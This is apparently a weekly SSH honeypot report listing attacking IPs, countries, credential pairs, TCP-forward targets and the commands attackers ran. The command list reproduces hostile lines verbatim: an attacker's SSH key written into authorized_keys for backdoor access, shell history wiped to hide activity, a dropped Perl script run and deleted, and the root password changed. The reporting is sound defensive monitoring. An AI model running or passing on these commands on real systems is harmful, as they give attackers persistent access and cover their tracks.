This week we saw a dip in IP’s hitting the Honey Pot down to 438 compared to 1429 from last night. This also equates to a lower level of countries as well as TCP forwarding requests and commands being run.
Total attacking IPs: 438
Total Countries: 49
Total User/pass successful combos: 648
Total Commands ran: 251
Total TCP forward requests : 8395
TOP 30 Attacking IP’s
We continue to see the domination of 188.166.89.44 against the Hot Pot, The IP is 19x the of the following IP 5.188.86.216. Compared to last week which held the second spot on the list seems to not be listed which is a great indication the host has been cleaned.
30039 188.166.89.44
1570 5.188.86.216
1468 45.227.255.162
1404 5.188.87.60
1400 5.188.86.165
1378 5.188.87.51
1339 5.188.86.167
1305 5.188.86.180
1257 5.188.86.169
1250 161.97.107.231
1243 45.227.255.206
1148 5.188.87.57
1145 5.188.86.212
1132 5.188.86.210
1128 5.188.86.168
1116 45.227.255.207
1072 5.188.87.58
1023 5.188.86.221
886 5.188.87.53
868 5.188.87.49
839 5.188.86.207
774 5.188.86.178
663 5.188.86.206
508 94.23.253.182
456 45.227.255.161
327 5.182.39.64
315 185.232.67.36
265 5.182.39.62
213 69.158.207.141
203 78.128.113.149
Countries of Orgin
We continue to see China and United States hold the domination of first and second spot. We now see Russia taking 3rd spot from last weeks 6th spot.
104 China
87 United States
25 Russia
18 Ireland
18 India
17 France
17 Singapore
16 Panama
15 Germany
14 Netherlands
12 Vietnam
9 Brazil
8 South Korea
7 Canada
6 Romania
6 United Kingdom
5 Poland
5 Colombia
3 Italy
3 Hong Kong
3 Indonesia
2 Argentina
2 Republic of Lithuania
2 Spain
2 Sweden
2 Finland
2 None
2 Mexico
2 Tunisia
2 Latvia
Username and password combos
Nothing has really changed here since last week root/admin continues to be number 1 with 26,579 requests.
26579 root/admin
71 root/root
51 root/1234
46 root/123456
37 root/QWEqwe123
36 root/ZAQ!2wsx
35 root/QAZ!2wsx
16 root/changeme
13 root/writer
10 root/1234567890
TOP 30 Commands
The Top command for the second week in a row is uname -a;nproc. We see the Thorbins.sh. attack not listed anymore. There were no recorded droppers being deployed since it been a quiet week.
1248 uname -a;nproc
255 uname -s -v -n -r
224 uname -a
221 cat /proc/cpuinfo | grep name | wc -l
220 uname
220 crontab -l
220 ls -lh $(which ls)
220 which ls
220 w
220 free -m | grep Mem | awk ‘{print $2 ,$3, $4, $5, $6, $7}’
220 top
220 lscpu | grep Model
220 cd ~ && rm -rf .ssh && mkdir .ssh && echo “ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr”>>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
220 cat /proc/cpuinfo | grep name | head -n 1 | awk ‘{print $4,$5,$6,$7,$8,$9;}’
220 cat /proc/cpuinfo | grep model | grep name | wc -l
220 uname -m
173 uname -a
30 uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;cat .ssh/authorized_keys|grep -v ‘heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==’ >>.ssh/.auth_k;echo ‘ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==’ >> .ssh/.auth_k;mv .ssh/.auth_k .ssh/authorized_keys
15 perl /var/tmp/clamav.pl;rm -rf /var/tmp/clamav.pl
15 scp -t /var/tmp/clamav.pl
5 uname -a ;
2 ps | grep ‘[Mm]iner’
2 /ip cloud print
2 ifconfig
2 ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
2 ps -ef | grep ‘[Mm]iner’
2 cat /proc/cpuinfo
2 echo Hi | cat -n
1 echo “root:SEFDfHeFf9Bb”|chpasswd|bash
1 echo “root:rDDhLMIBUvqU”|chpasswd|bash
TOP 30 TCP forward Transmission
We continue seeing Yandex being the main target of the TCP forward requests followed by evernote.
19193 ya.ru:80
3214 www.evernote.com:443
2587 www.google.com:443
2097 reg.ebay.com:443
1296 www.amazon.com:443
1035 iforgot.apple.com:443
884 oauth.vk.com:443
837 api.sendspace.com:443
789 13.32.57.69:443
759 69.195.128.18:80
670 soundcloud.com:443
634 accounts.ea.com:443
587 188.125.73.109:993
574 212.82.101.50:993
547 ip.bablosoft.com:80
521 96.43.128.70:80
514 s.youtube.com:443
373 212.82.101.50:143
371 188.125.73.92:995
367 212.82.101.34:995
367 188.125.73.109:143
317 authserver.mojang.com:443
294 www.wish.com:443
281 idmsa.apple.com:443
278 www.google.co.uk:443
277 172.217.18.164:443
269 steamcommunity.com:443
264 omegle.com:80
259 184.150.200.201:993
247 www.google.com.au:443
This week was much more quieter than the previous 4 weeks, lets see if this becomes the norm.